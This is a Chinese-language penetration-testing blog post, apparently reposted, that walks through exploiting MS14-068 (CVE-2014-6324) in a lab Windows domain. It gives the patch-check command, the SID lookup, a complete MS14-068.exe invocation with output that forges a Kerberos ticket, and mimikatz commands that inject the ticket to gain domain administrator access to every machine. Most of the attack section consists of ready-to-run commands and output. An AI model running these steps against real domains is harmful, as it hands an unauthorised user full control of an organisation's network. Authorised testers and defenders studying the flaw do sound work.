本文共 2051 字,大约阅读时间需要 6 分钟。
在做***测试时,当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。
域控制器 2008r2 dc.test.com 192.168.3.100
域内机器 2008r2 client.test.com 192.168.3.10MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测
systeminfo |find "3011780"
为空则代表没有打该补丁,存在漏洞!
如果属于黑盒测试,并没有直接操作域控制器的权限,那么只能使用该漏洞,看是否能成功伪造域管理员登录来验证获取域成员sid的方式有多种,当然前提是建立在0x01上,本次使用最为简单的命令获取
whoami /all #该命令获取当前登录用户的信息,这里使用的是域成员登录,所以获取到的是域成员normal的sid
使用ms14-068.exe,网上有多种版本,有python脚本(需要在***机上安装python2.x版本,略麻烦),也有已经从python转exe的版本,不需要依赖python环境,下载地址:
C:\Users\normal\Desktop>MS14-068.exeUSAGE:MS14-068.exe -u@ -s -d OPTIONS: -p --rc4 C:\Users\normal\Desktop>MS14-068.exe -u normal@test.com -s S-1-5-21-1406004368-3818689962-3591297438-1105 -d 192.168.3.100 -p Server1 [+] Building AS-REQ for 192.168.3.100... Done! [+] Sending AS-REQ to 192.168.3.100... Done! [+] Receiving AS-REP from 192.168.3.100... Done! [+] Parsing AS-REP from 192.168.3.100... Done! [+] Building TGS-REQ for 192.168.3.100... Done! [+] Sending TGS-REQ to 192.168.3.100... Done! [+] Receiving TGS-REP from 192.168.3.100... Done! [+] Parsing TGS-REP from 192.168.3.100... Done! [+] Creating ccache file 'TGT_normal@test.com.ccache'... Done!使用方法:ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
如果操作正确,且域机器是可以和域控制器互通则会创建.ccache文件
域成员密码错误情况图使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器
mimikatz # kerberos::purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造mimikatz # kerberos::list //查看当前机器凭证mimikatz # kerberos::ptc 票据文件 //将票据注入到内存中当显示injecting ticket ok时,表示已经成功将票据注入到内存中,可在机器中用klist查看
伪造后,进行尝试访问域控制器
注入票据前是不能访问的
注入票据时,机器不能是03或xp,因为mimikatz不支持这两个机器注入,听大佬说过有工具可以注入,希望有知道的朋友可以留言
转载于:https://blog.51cto.com/z2ppp/2060051